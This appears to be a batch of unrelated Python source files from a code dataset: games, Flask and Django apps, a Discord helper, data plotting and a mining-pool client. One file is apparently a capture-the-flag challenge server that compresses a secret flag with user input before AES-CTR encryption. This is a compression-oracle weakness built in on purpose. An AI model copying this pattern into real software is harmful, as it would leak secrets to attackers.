self.randomize: # turning this off for now\n tileval = 2 if random.random() > 0.8 else 1 # assuming a 4:1 distribution ratio\n else:\n tileval = 1\n \n id = random.choice(empty_pos)\n self.board += tileval << (4 * id)\n \n\n def placeTile(self, pos):\n self.board = self.board | 1 << (4 * pos)\n\n def swipeLeft(self):\n row1 = (0xFFFF << 48 & self.board) >> 48\n row2 = (0xFFFF << 32 & self.board) >> 32\n row3 = (0xFFFF << 16 & self.board) >> 16\n row4 = 0xFFFF & self.board\n self.board = self.tableL[row1] << 48 | self.tableL[row2] << 32 | self.tableL[row3] << 16 | self.tableL[row4]\n\n def swipeRight(self):\n row1 = (0xFFFF << 48 & self.board) >> 48\n row2 = (0xFFFF << 32 & 
self.board) >> 32\n row3 = (0xFFFF << 16 & self.board) >> 16\n row4 = 0xFFFF & self.board\n self.board = self.tableR[row1] << 48 | self.tableR[row2] << 32 | self.tableR[row3] << 16 | self.tableR[row4]\n\n def swipeUp(self):\n transpose = self.transpose(self.board)\n row1 = (0xFFFF << 48 & transpose) >> 48\n row2 = (0xFFFF << 32 & transpose) >> 32\n row3 = (0xFFFF << 16 & transpose) >> 16\n row4 = 0xFFFF & transpose\n self.board = self.transpose(self.tableL[row1] << 48 | self.tableL[row2] << 32 | self.tableL[row3] << 16 | self.tableL[row4])\n\n def swipeDown(self):\n transpose = self.transpose(self.board)\n row1 = (0xFFFF << 48 & transpose) >> 48\n row2 = (0xFFFF << 32 & transpose) >> 32\n row3 = (0xFFFF << 16 & transpose) >> 16\n row4 = 0xFFFF & transpose\n self.board = self.transpose(self.tableR[row1] << 48 | self.tableR[row2] << 32 | self.tableR[row3] << 16 | self.tableR[row4])\n\n\n '''\n ---------------------\n INTERACTION FUNCTIONS\n ---------------------\n '''\n\n def getScore(self):\n '''\n score = 0\n for x in range(self.size ** 2):\n val = ((0xF << x) & self.board) >> x\n if val >= 2:\n score += (val - 1) * (1 << val)\n return score\n '''\n row1 = (0xFFFF << 48 & self.board) >> 48\n row2 = (0xFFFF << 32 & self.board) >> 32\n row3 = (0xFFFF << 16 & self.board) >> 16\n row4 = 0xFFFF & self.board\n return self.scoreTable[row1] + self.scoreTable[row2] + self.scoreTable[row3] + self.scoreTable[row4]\n\n # should return a list of new boards\n def generateSuccessor(self, action):\n pre_action = Game_2048(self.board, self.tableL, self.tableR, self.scoreTable)\n if(action == 3):\n pre_action.swipeLeft()\n elif(action == 0):\n pre_action.swipeUp()\n elif(action == 1):\n pre_action.swipeRight()\n else:\n pre_action.swipeDown()\n empty_pos = pre_action.emptyPos()\n post_actions = [Game_2048(pre_action.board, pre_action.tableL, pre_action.tableR, pre_action.scoreTable) for i in range(len(empty_pos))]\n for i in range(len(empty_pos)):\n emp = empty_pos[i]\n post_actions[i].placeTile(emp)\n return post_actions\n\n def swipe(self, action):\n pre_board = self.board\n if(action == 3):\n self.swipeLeft()\n elif(action == 0):\n self.swipeUp()\n elif(action == 1):\n self.swipeRight()\n else:\n self.swipeDown()\n return pre_board != self.board\n\n def copy(self):\n return copy.deepcopy(self)\n\n def getLegalMoves(self):\n legalmoves = set()\n for action in self.options:\n tempboard = Game_2048\n tempboard.swipe(action)\n if tempboard.board != self.board:\n legalmoves.add(action)\n return legalmoves\n\n def isEnd(self):\n grid = self.bitToBoard()\n for i in range(self.size):\n for j in range(self.size):\n e = grid[i, j]\n if not e:\n return False\n if j and e == grid[i, j - 1]:\n return False\n if i and e == grid[i - 1, j]:\n return False\n return True\n\n def printScore(self):\n print('Current score is %d' % self.score)\n\n def getHighest(self):\n max = 0\n for k in range(self.size ** 2):\n val = 1 << ((self.board >> (4 * k)) & 0xF)\n if val > 1:\n if val > max:\n max = val\n return max\n\n############################################################\n\ndef playNGames2048(n):\n games = [Game_2048.fromNew() for _ in range(n)]\n numMoves = 0\n\n print('Welcome to n-2048!')\n print('You will be playing %d concurrent games of 2048!' % n)\n print('Game over when one of the %d boards reaches an end state, i.e. all spaces are filled.' % n)\n print('Score is determined by average score over the %d boards at the end.' 
% n)\n print('')\n\n def checkEndGame(games, k):\n if games[k].isEnd():\n print('Game over at board %d!' % k)\n games[k].printBoard()\n score = sum(games[_].getScore() for _ in range(n))\n print('Your score is %2.f!' % (score / float(n)))\n print('Your number of moves is %d' % numMoves)\n return True\n\n while 1:\n for k in range(n):\n games[k].placeRandomTile()\n games[k].printBoard()\n if checkEndGame(games, k): return\n\n allLegalMoves = games[k].options\n\n while 1 < 2:\n print(\"Legal moves are: %s\" % ', '.join(move for move in allLegalMoves))\n swipe = games[0].getInput()\n if swipe in allLegalMoves: break\n else: print(\"Please enter a valid move!\")\n\n for k in range(n):\n games[k].swipe(swipe)\n\n numMoves += 1\n\n#playNGames2048(1)\n","sub_path":"Old Files/bitstate/bitstate.py","file_name":"bitstate.py","file_ext":"py","file_size_in_byte":10228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"622357172","text":"'''Functions to fetch data from JSON file, plot them and save them to a sqlite3 database'''\n\nimport pandas as pd\nimport sqlite3\nimport matplotlib.pyplot as plt\n\n\ndef read_json(json_file):\n \"\"\"Reads a given JSON file and returns a simplified dataframe\"\"\"\n print(\"Reading JSON file: {}\".format(json_file))\n jsondata=pd.read_json(json_file)\n jsondata=jsondata[[\"fint\", \"hr\", \"prec\", \"rviento\", \"ta\", \"tamax\", \"tamin\", \"vmax\", \"vv\"]]\n print(jsondata.head())\n return jsondata\n\n\ndef plot_json(df):\n datadate=df.iloc[-1,0][:-6].replace(\"T\", \" at \")\n times=[i.split(\"T\")[1][:-6] for i in df.fint]\n plt.plot(times, df[\"ta\"], color=\"orange\", label=\"Temperatures\")\n plt.plot(times, df[\"vv\"], color=\"blue\", label=\"Wind Speed\")\n plt.legend()\n plt.xlabel(\"Last 24h\")\n plt.ylabel(\"Temperature (ºC) and Wind Speed (km/h)\")\n plt.title(\"Temperature and Wind Speed in C. 
UNIVERSITARIA - {}h\".format(datadate))\n plt.grid(True)\n #plt.show()\n plt.savefig(\"graph_{}.png\".format(datadate))\n\n\ndef create_db(df):\n conn=sqlite3.connect(\"aemet.db\")\n df.to_sql(\"cuniv\", conn)\n conn.close()\n\n\ndef update_db(df):\n conn=sqlite3.connect(\"aemet.db\")\n df.to_sql(\"cuniv\", conn, if_exists=\"append\", index=False)\n conn.close()\n\n\n\"\"\" def remove_duplicates():\n conn = sqlite3.connect(\"aemet.db\")\n with conn: \n cur = conn.cursor() \n cur.execute(\"SELECT fint, COUNT(*) FROM cuniv GROUP BY fint HAVING COUNT(*) > 1\")\n rows = cur.fetchall()\n conn.commit()\n for row in rows:\n print(\"Duplicate: {}\".format(row)) \"\"\"\n\n\n\nif __name__ == \"__main__\":\n j=read_json(\"data_aemet_20190420-102259.json\")\n plot_json(j)\n ","sub_path":"dber.py","file_name":"dber.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"71907601","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: gabriel\r\n\"\"\"\r\n\r\n\r\ndef flippblipp(n):\r\n if n % 3 == 0 and n % 5 == 0:\r\n return \"flipp blipp\"\r\n elif n % 5 == 0:\r\n return \"blipp\"\r\n elif n % 3 == 0:\r\n return \"flipp\"\r\n else:\r\n return str(n)\r\n\r\n\r\n# the function must be defined before this module-level call runs\r\nfor n in range(16):\r\n print(flippblipp(n))\r\n","sub_path":"flippblipp-v2.py","file_name":"flippblipp-v2.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"83705981","text":"# import libraries\nimport zlib\nimport os\nimport string\nfrom Crypto.Cipher import AES\nfrom Crypto.Util import Counter\n\n# determine PROBLEM_KEY(lowercase letters and underscore)\nENCRYPT_KEY = bytes(bytearray.fromhex('0000000000000000000000000000000000000000000000000000000000000000'))\nPROBLEM_KEY = 'not_the_flag'\nALREADY_GUESSED = \"\"\nMIN_LENGHT = 32\n\n# encrypt function\ndef encrypt(data, ctr):\n return AES.new(ENCRYPT_KEY, AES.MODE_CTR, counter=ctr).encrypt(zlib.compress(data))\n\n# encryption service\ndef service(): \n while True:\n\n # read input\n f = raw_input(\"Encrypting service\\n\")\n if len(f) < 20:\n continue\n \n # encrypt (PROBLEM_KEY + input), encoded as UTF-8 with 64-bit counter, with 64-bit random prefix\n enc = encrypt(bytes((PROBLEM_KEY + f).encode('utf-8')), Counter.new(64, prefix=os.urandom(8)))\n print(\"%s%s\" %(enc, chr(len(enc))))","sub_path":"crypto/flatcrypt/serv-distribute.py","file_name":"serv-distribute.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"111664028","text":"from typing import List\nfrom utils import message_parsing\nfrom .constants import PERMISSIONS\nimport discord\n\n\nclass Context:\n \"\"\"\n Custom object that gets passed to commands.\n Not intended to be created manually.\n \"\"\"\n def __init__(self, msg: discord.Message, amethyst: discord.Client):\n cleaned = message_parsing.parse_prefixes(msg.content, amethyst.config['AMETHYST_PREFIXES'])\n self.msg = msg\n self.cmd = message_parsing.get_cmd(cleaned)\n self.suffix, self.args = message_parsing.get_args(cleaned)\n\n async def _send(self, content, dest, *, embed=None, file=None, files=None):\n \"\"\"Internal send function, not actually meant to be used by anyone.\"\"\"\n if dest == 'channel':\n return await self.msg.channel.send(content, embed=embed, file=file, files=files)\n elif dest == 'author':\n return await self.msg.author.send(content, embed=embed, file=file, 
files=files)\n else:\n raise ValueError('Destination is not `channel` or `author`.')\n\n async def send(self, content: str=None,\n *, dest: str='channel',\n embed: discord.Embed=None, file: discord.File=None,\n files: List[discord.File]=None) -> discord.Message:\n \"\"\"Sends a message to the context origin, can either be the channel or author.\"\"\"\n if content is None and not embed and not file and not files:\n raise TypeError('No content and no attachments.')\n elif content:\n # Escape bad mentions\n content = str(content).replace('@everyone', '@\\u200Beveryone').replace('@here', '@\\u200Bhere')\n\n msg = None\n\n # Splitting messages if they are larger than 2000 chars.\n # Also properly does codeblocks.\n # (Could be done nicer but eh)\n if content and len(content) > 2000:\n if content.find('```') == -1 or content.find('```', content.find('```') + 3) == -1:\n await self._send(content[:2000], dest, embed=embed, file=file, files=files)\n await self.send(content[2000:], dest=dest)\n elif content.find('```', content.find('```') + 3) + 2 < 2000:\n await self._send(content[:content.find('```', content.find('```') + 3) + 3], dest,\n embed=embed, file=file, files=files)\n await self.send(content[content.find('```', content.find('```') + 3) + 3:], dest=dest)\n else:\n start_block = content[content.find('```'):content.find('\\n', content.find('```')) + 1]\n\n if content.find('\\n', content.find('```')) == content.rfind('\\n', 0, 2000):\n split_cont = content[:1996] + '\\n```'\n content = start_block + content[1996:]\n else:\n split_cont = content[:content.rfind('\\n', 0, content.rfind('\\n', 0, 2000) + 1)][:1996] + '\\n```'\n content = start_block + content[len(split_cont) - 4:]\n\n await self.send(split_cont + content, dest=dest, embed=embed, file=file, files=files)\n else:\n msg = await self._send(content, dest, embed=embed, file=file, files=files)\n\n return msg\n\n def is_dm(self) -> bool:\n \"\"\"Check if the channel for the context is a DM or not.\"\"\"\n return isinstance(self.msg.channel, discord.DMChannel)\n\n def has_permission(self, permission: str, who: str='self') -> bool:\n \"\"\"Check if someone in context has a permission.\"\"\"\n if who not in ['self', 'author']:\n raise ValueError('Invalid value for `who` (must be `self` or `author`).')\n\n if permission not in PERMISSIONS:\n return False\n\n if who == 'self':\n return getattr(self.msg.channel.permissions_for(self.msg.guild.me), permission)\n elif who == 'author':\n return getattr(self.msg.channel.permissions_for(self.msg.author), permission)\n\n def typing(self):\n \"\"\"d.py `async with` shortcut for sending typing to a channel.\"\"\"\n return self.msg.channel.typing()\n","sub_path":"utils/dusk/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"399305102","text":"import cv2\nimport matplotlib.pyplot as plt\n\nimg_bgr = cv2.imread('aaa.jpg')\nimg_rgb = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2RGB) # convert to RGB format\nimg_hsv = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2HSV) # convert to HSV format\nimg_hls = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2HLS) # convert to HLS format\nplt.figure(figsize=(18, 
8))\nplt.subplot(221)\nplt.imshow(img_rgb)\nplt.title('RGB')\nplt.subplot(222)\nplt.imshow(img_bgr)\nplt.title('BGR')\nplt.subplot(223)\nplt.imshow(img_hls)\nplt.title('HLS')\nplt.subplot(224)\nplt.imshow(img_hsv)\nplt.title('HSV')\n\nplt.show()","sub_path":"image_sha.py","file_name":"image_sha.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"56592474","text":"#import PyMongo as PyMongo\nfrom flask import Flask, render_template, request\nfrom flask_pymongo import PyMongo\nimport numpy as np\nimport pickle\nimport joblib\nimport sklearn\n\n\n\nimport json\n\n\napp = Flask(__name__)\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/road_collusion\"\napp.config[\"MONGO_DBNAME\"] = \"road_collusion\"\nmongo = PyMongo(app)\n\ndb_collection = mongo.db.collusion_final\n\n\n################# Global Variables ################\n\nweek = [1,2,3,4,5,6,7]\nmonth = [1,2,3,4,5,6,7,8,9,10,11,12]\nyear = [1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017]\nmonth_data=[]\n\n\n\n\n########## Month data counting and put it in an array #########\n\nmonth_label = list(db_collection.distinct(\"C_MNTH\"))\n\nfor items in month:\n count_month = db_collection.find({\"C_MNTH\": items}).count()\n month_data = np.append(month_data, count_month)\n\n@app.route('/')\ndef home():\n # data_array = [20, 1, 3 , 13, 1, 6, 0, 16, 90, 22]\n #print(data_array)\n\n #final_model = joblib.load(open(\"/Users/tasrifahmed/PyProjects/collusion_Project/random_forest_model.sav\", \"rb\"))\n #final_model = pickle.load(open(\"random_forest_model.sav\", \"rb\"))\n #Prediction = final_model.predict(np.array([data_array]))\n #print(Prediction)#\n\n\n\n\n count_all = db_collection.count()\n max_in_month = np.max(month_data)\n ave_in_month = int(np.average(month_data))\n\n ##### RoadWay Collusion ######\n\n def road_conf_year(year, road_config):\n config_query = db_collection.find({\"C_YEAR\":{\"$eq\":year}, \"C_RCFG\":{\"$eq\":road_config}}).count()\n return config_query\n\n year_2011_1 = road_conf_year(2011, 1)\n year_2011_2 = road_conf_year(2011, 2)\n year_2011_3 =road_conf_year(2011, 3)\n\n year_2012_1 = road_conf_year(2012, 1)\n year_2012_2 = road_conf_year(2012, 2)\n year_2012_3 = road_conf_year(2012, 3)\n\n year_2013_1 = road_conf_year(2013, 1)\n year_2013_2 = road_conf_year(2013, 2)\n year_2013_3 = road_conf_year(2013, 3)\n\n year_2014_1 = road_conf_year(2014, 1)\n year_2014_2 = road_conf_year(2014, 2)\n year_2014_3 = road_conf_year(2014, 3)\n\n year_2015_1 = road_conf_year(2015, 1)\n year_2015_2 = road_conf_year(2015, 2)\n year_2015_3 = road_conf_year(2015, 3)\n\n year_2016_1 = road_conf_year(2016, 1)\n year_2016_2 = road_conf_year(2016, 2)\n year_2016_3 = road_conf_year(2016, 3)\n\n year_2017_1 = road_conf_year(2017, 1)\n year_2017_2 = road_conf_year(2017, 2)\n year_2017_3 = road_conf_year(2017, 3)\n\n\n########## Count Year Collusion ############\n\n count_2015 = db_collection.find({\"C_YEAR\": 2015}).count()\n count_2016 = db_collection.find({\"C_YEAR\": 2016}).count()\n count_2017 = db_collection.find({\"C_YEAR\": 2017}).count()\n\n\n\n############## Colusion due to weather###############\n\n rain_count = db_collection.find({\"C_WTHR\": 3}).count()\n clear_count = db_collection.find({\"C_WTHR\": 1}).count()\n snow_count = db_collection.find({\"C_WTHR\": 4}).count()\n\n\n################ Max count Time ##############\n\n\n hour_count = 
db_collection.find({\"C_HOUR\": {\"$gt\": 15, \"$lt\":22}}).count()\n\n\n\n return render_template('index.html', count_all = count_all, month_max = max_in_month , average = ave_in_month,\n year_2011_2 = year_2011_2, year_2011_3= year_2011_3,year_2011_1=year_2011_1, year_2012_1=year_2012_1,\n year_2012_2 = year_2012_2, year_2012_3 = year_2012_3, year_2013_1 =year_2013_1, year_2013_2 = year_2013_2,\n year_2013_3 = year_2013_3, year_2014_1=year_2014_1,year_2014_2=year_2014_2,year_2014_3=year_2014_3,year_2015_1=year_2015_1,\n year_2015_2 = year_2015_2, year_2015_3=year_2015_3, year_2016_1=year_2016_1, year_2016_2=year_2016_2,\n year_2016_3=year_2016_3, year_2017_1=year_2017_1, year_2017_2 =year_2017_2, year_2017_3=year_2017_3,\n count_2015 = count_2015, count_2016=count_2016, count_2017=count_2017, rain_count=rain_count, clear_count=clear_count,\n snow_count = snow_count, hour_count=hour_count\n\n\n\n\n\n\n\n\n\n\n )\n\n\n@app.route('/charts', methods=[\"GET\"])\ndef charts():\n\n#Line chart making data\n\n year_data = []\n year_label = list(db_collection.distinct(\"C_YEAR\"))\n for items in year:\n count_year = db_collection.find({\"C_YEAR\": items}).count()\n year_data = np.append(year_data,count_year)\n\n count_1999 = db_collection.find({\"C_YEAR\": 1999}).count()\n count_2014 = db_collection.find({\"C_YEAR\": 2014}).count()\n count_all = db_collection.count()\n\n\n#Count Mail and female number from database\n count_male= db_collection.find({\"P_SEX\": \"M\"}).count()\n count_female = db_collection.find({\"P_SEX\": \"F\"}).count()\n\n age_list = list(db_collection.distinct(\"P_AGE\"))\n\n\n####### bar chart data ######\n count_jan = db_collection.find({\"C_MNTH\": 1}).count()\n count_oct = db_collection.find({\"C_MNTH\": 10}).count()\n\n #month_data = np.array([count_jan, count_feb, count_mar, count_apr,count_may, count_jun, count_jul, count_aug,\n # count_sep, count_oct, count_nov, count_dec])\n\n\n\n################# Age distribution on donut chart #################\n\n young_age = db_collection.find({\"P_AGE\": {\"$gt\": 15, \"$lt\":28}}).count()\n middle_age = db_collection.find({\"P_AGE\": {\"$gt\": 29, \"$lt\":45}}).count()\n old_age = db_collection.find({\"P_AGE\": {\"$gt\": 46, \"$lt\":100}}).count()\n\n\n################ Daywise Collusion ##################\n\n\n\n collusion_monday_clear = db_collection.find({\"C_WDAY\":1, \"C_WTHR\":1}).count()\n collusion_tuesday_clear = db_collection.find({\"C_WDAY\":2, \"C_WTHR\":1}).count()\n collusion_wedensday_clear = db_collection.find({\"C_WDAY\":3, \"C_WTHR\":1}).count()\n collusion_thursday_clear = db_collection.find({\"C_WDAY\":4, \"C_WTHR\":1}).count()\n collusion_friday_clear = db_collection.find({\"C_WDAY\":5, \"C_WTHR\":1}).count()\n collusion_saturday_clear = db_collection.find({\"C_WDAY\":6, \"C_WTHR\":1}).count()\n collusion_sunday_clear = db_collection.find({\"C_WDAY\":7, \"C_WTHR\":1}).count()\n data_sunny= np.array([collusion_monday_clear, collusion_tuesday_clear, collusion_wedensday_clear, collusion_thursday_clear,\n collusion_friday_clear, collusion_saturday_clear, collusion_sunday_clear ])\n total_data_clear = np.sum(data_sunny)\n\n collusion_monday_snow = db_collection.find({\"C_WDAY\":1, \"C_WTHR\":4}).count()\n collusion_tuesday_snow = db_collection.find({\"C_WDAY\":2, \"C_WTHR\":4}).count()\n collusion_wedensday_snow = db_collection.find({\"C_WDAY\":3, \"C_WTHR\":4}).count()\n collusion_thursday_snow = db_collection.find({\"C_WDAY\":4, \"C_WTHR\":4}).count()\n collusion_friday_snow = db_collection.find({\"C_WDAY\":5, 
\"C_WTHR\":4}).count()\n collusion_saturday_snow =db_collection.find({\"C_WDAY\":6, \"C_WTHR\":4}).count()\n collusion_sunday_snow = db_collection.find({\"C_WDAY\":7, \"C_WTHR\":4}).count()\n data_snow = np.array([collusion_monday_snow, collusion_tuesday_snow, collusion_wedensday_snow,collusion_thursday_snow,\n collusion_friday_snow, collusion_saturday_snow, collusion_sunday_snow ])\n\n total_data_snow = np.sum(data_snow)\n\n\n\n\n collusion_monday_rain = db_collection.find({\"C_WDAY\":1, \"C_WTHR\":3}).count()\n collusion_tuesday_rain = db_collection.find({\"C_WDAY\":2, \"C_WTHR\":3}).count()\n collusion_wedensday_rain = db_collection.find({\"C_WDAY\":3, \"C_WTHR\":3}).count()\n collusion_thursday_rain = db_collection.find({\"C_WDAY\":4, \"C_WTHR\":3}).count()\n collusion_friday_rain = db_collection.find({\"C_WDAY\":5, \"C_WTHR\":3}).count()\n collusion_saturday_rain =db_collection.find({\"C_WDAY\":6, \"C_WTHR\":3}).count()\n collusion_sunday_rain = db_collection.find({\"C_WDAY\":7, \"C_WTHR\":3}).count()\n data_rain = np.array([collusion_monday_rain, collusion_tuesday_rain, collusion_wedensday_rain,collusion_thursday_rain,\n collusion_friday_rain, collusion_saturday_rain, collusion_sunday_rain ])\n\n total_data_rain = np.sum(data_rain)\n ################### Day wise collusion Polar Chart ###################\n\n day_wise =[]\n\n for day in week:\n collusio_day_wise = db_collection.find({\"C_WDAY\":day}).count()\n day_wise = np.append(day_wise, collusio_day_wise)\n print(day_wise)\n\n\n\n return render_template('charts.html', year_labels = year_label, count_1999= count_1999, count_2014=count_2014,count_all=count_all,\n year_data =year_data, count_m = count_male, count_f = count_female, age = age_list,\n month_data =month_data, month_label= month_label, count_jan = count_jan, count_oct = count_oct,\n young_age=young_age, middle_age=middle_age,old_age=old_age, data_sunny=data_sunny, data_snow=data_snow, data_rain=data_rain,\n total_data_snow=total_data_snow, total_data_clear=total_data_clear, total_data_rain=total_data_rain,\n day_wise=day_wise\n\n\n )\n\n\n@app.route('/tables', methods=[\"GET\"])\ndef tables():\n all_data = list(db_collection.find({}))\n return render_template('tables.html', show_data = all_data )\n\n\n@app.route('/forms')\ndef forms():\n\n\n return render_template('form.html')\n\n@app.route('/submitted', methods=['POST'])\ndef submit():\n global year, month\n\n def year_input_change(year1):\n # index n maps to year 1999 + n\n converter = {\n\n 0:\"1999\",\n 1:\"2000\",\n 2:\"2001\",\n 3:\"2002\",\n 4:\"2003\",\n 5:\"2004\",\n 6:\"2005\",\n 7:\"2006\",\n 8:\"2007\",\n 9:\"2008\",\n 10:\"2009\",\n 11:\"2010\",\n 12:\"2011\",\n 13:\"2012\",\n 14:\"2013\",\n 15:\"2014\",\n 16:\"2015\",\n 17:\"2016\",\n 18:\"2017\",\n 19:\"2018\",\n 20:\"2019\",\n 21:\"2020\"\n }\n return converter.get(year1, \"nothing\")\n\n\n year_initial = int(request.form.get(\"year\"))\n print(year_initial)\n year_final = year_input_change(year_initial)\n print(year_final)\n month = int(request.form.get(\"month\"))\n day = int(request.form.get(\"day\"))\n hour = int(request.form.get(\"hour\"))\n v_number = int(request.form.get(\"v_number\"))\n road = int(request.form.get(\"road\"))\n weather = int(request.form.get(\"weather\"))\n traffic = int(request.form.get(\"traffic\"))\n v_year = int(request.form.get(\"v_year\"))\n age = int(request.form.get(\"age\"))\n #db_collection.insert_one({'C_YEAR': year_final, 'C_MNTH': month , 'C_WDAY': day, 'C_HOUR': hour , 'C_VEHS': v_number , 'C_CONF': road,\n #'C_WTHR': weather, 
'C_TRAF':traffic , 'V_YEAR':v_year , 'P_AGE':age })\n\n data_array = np.array([year_initial,month,day,hour,v_number,road,weather,traffic,v_year,age])\n print(data_array)\n #[9, 10, 2, 55, 2, 15, 0, 16, 94, 28]\n\n final_model = pickle.load(open(\"/Users/tasrifahmed/random_forest_model.sav\", \"rb\"))\n Prediction_initial = final_model.predict(np.array([data_array]))\n print(Prediction_initial)\n final_prediction = int(Prediction_initial[0])\n print(final_prediction)\n\n db_collection.insert_one(\n {'C_YEAR': year_final, 'C_MNTH': month, 'C_WDAY': day, 'C_HOUR': hour, 'C_VEHS': v_number, 'C_CONF': road,\n 'C_WTHR': weather, 'C_TRAF': traffic, 'V_YEAR': v_year, 'P_AGE': age, 'C_RCFG':final_prediction})\n\n def convert_prediction(prediction):\n conveter = {\n\n 0:\"Non-Intersection\",\n 1:\"At an intersection of at least two public roadways\",\n 2:\"Intersection with parking lot entrance/exit, private driveway or laneway\",\n 3:\"Railroad level crossing\",\n 4:\"Bridge, overpass, viaduct\",\n 5:\"Tunnel or underpass\",\n 6:\"Passing or climbing lane\",\n 7:\"Ramp\",\n 8:\"Traffic circle\",\n 9:\"Express lane of a freeway system\",\n 10:\"Collector lane of a freeway system\",\n 11:\"Transfer lane of a freeway system\"\n\n\n\n }\n return conveter.get(prediction, \"Sorry!!! Wrong Prediction\")\n Pretty_prediction = convert_prediction(final_prediction)\n\n print(Pretty_prediction)\n\n return render_template('submitted.html' , show_data = Pretty_prediction )\n\n\n\n\n\napp.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"472262761","text":"import requests, hashlib\nfrom urllib.request import Request, urlopen\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nPoolURL = os.getenv(\"PoolURL\")\n\n\ndef get_html(link):\n try:\n print(link)\n fp = Request(link,headers={'User-Agent': 'Mozilla/5.0'})\n fp = urlopen(fp).read()\n mybytes = fp\n mystr = mybytes.decode(\"utf8\")\n return mystr\n except Exception as e:\n print(e)\n return \"Error\"\n\ndef GetWork():\n data = get_html(f\"{PoolURL}/GetWork\")\n data = data.split(\",\")\n start = int(data[0])\n end = int(data[1])\n return (start,end)\n","sub_path":"Miner/BasicPoolMiningAPI.py","file_name":"BasicPoolMiningAPI.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"394377569","text":"#!/usr/bin/python3\n\"\"\"View for user objects that handles all default RestFul API actions \"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import jsonify, abort, make_response, request\nfrom models import storage\nfrom models.user import User\n\n\n@app_views.route('/users', strict_slashes=False)\ndef get_users():\n \"\"\" Retrieves the list of all user objects:\n GET /api/v1/users\n \"\"\"\n users = []\n all_users = storage.all(User).values()\n\n for each in all_users:\n users.append(each.to_dict())\n\n return jsonify(users)\n\n\n@app_views.route('/users/', strict_slashes=False)\ndef get_users_by_id(user_id):\n \"\"\" Retrieves a user object:\n GET /api/v1/users/\n \"\"\"\n user = storage.get(User, user_id)\n\n if user is None:\n abort(404)\n\n return jsonify(user.to_dict())\n\n\n@app_views.route('/users/',\n methods=['DELETE'],\n strict_slashes=False)\ndef delete_user(user_id):\n \"\"\" Deletes a user object:\n DELETE /api/v1/users/\n \"\"\"\n user = storage.get(User, user_id)\n\n if user is 
None:\n abort(404)\n\n user.delete()\n storage.save()\n\n return jsonify({})\n\n\n@app_views.route('/users',\n strict_slashes=False,\n methods=['POST'])\ndef create_user():\n \"\"\" Creates a user:\n POST /api/v1/users\n \"\"\"\n req_json = request.get_json()\n\n if not req_json:\n return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n\n if \"email\" not in req_json:\n return make_response(jsonify({\"error\": \"Missing email\"}), 400)\n\n if \"password\" not in req_json:\n return make_response(jsonify({\"error\": \"Missing password\"}), 400)\n\n user = User(**req_json)\n user.save()\n\n return make_response(jsonify(user.to_dict()), 201)\n\n\n@app_views.route('/users/',\n methods=['PUT'],\n strict_slashes=False)\ndef update_user(user_id):\n \"\"\" Updates a user object:\n PUT /api/v1/users/\n \"\"\"\n upd_obj = request.get_json()\n user = storage.get(User, user_id)\n\n if user is None:\n abort(404)\n\n if not upd_obj:\n return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n\n for key, value in upd_obj.items():\n setattr(user, key, value)\n user.save()\n\n return jsonify(user.to_dict())\n","sub_path":"api/v1/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"154959597","text":"from django.shortcuts import render\nfrom django_tables2 import RequestConfig\n\nfrom .models import TechPost\nfrom .tables import TechPostTable\n\n\ndef tech_post_list(request):\n \"\"\"Show tech post List\"\"\"\n\n queryset_list = TechPost.published.all()\n\n if 'key' in request.POST:\n search_key = request.POST.get('key')\n if search_key:\n queryset_list = queryset_list.filter(title__icontains=search_key)\n\n table = TechPostTable(queryset_list)\n\n if not queryset_list:\n table.empty_text = '検索結果: 0件'\n\n RequestConfig(request, paginate={'per_page': 20}).configure(table)\n\n return render(request, 'tech_blog/techpost_list.html', {'table': table})\n\n\ndef post_detail(request, post_id):\n \"\"\"Show tech post detail\"\"\"\n post = TechPost.objects.get(pk=post_id)\n\n # increment populate counter to show populate article on views.\n count = post.populate\n count += 1\n post.populate = count\n post.save()\n\n populate_posts = TechPost.objects.all().order_by('-populate')[:5]\n recent_posts = TechPost.objects.all().order_by('-created')[:5]\n\n data = {\n 'post': post,\n 'populate_posts': populate_posts,\n 'recent_posts': recent_posts,\n }\n return render(request,\n 'tech_blog/techpost_detail.html',\n data)\n","sub_path":"src/tech_blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"564654061","text":"#1 = collude\n#0 = defect\n\ndef play(opponentMove):\n if opponentMove == 'start':\n return 1\n opponentHistory = []\n opponentHistory.append(opponentMove)\n if opponentHistory:\n return opponentHistory[-1]\n else:\n return 1\n return 0\n\ndef name():\n return 